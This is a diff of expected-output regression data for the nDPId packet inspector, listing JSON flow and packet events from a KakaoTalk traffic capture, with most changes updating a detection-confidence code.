00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} @@ -76,18 +76,18 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} @@ -96,20 +96,20 @@ 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 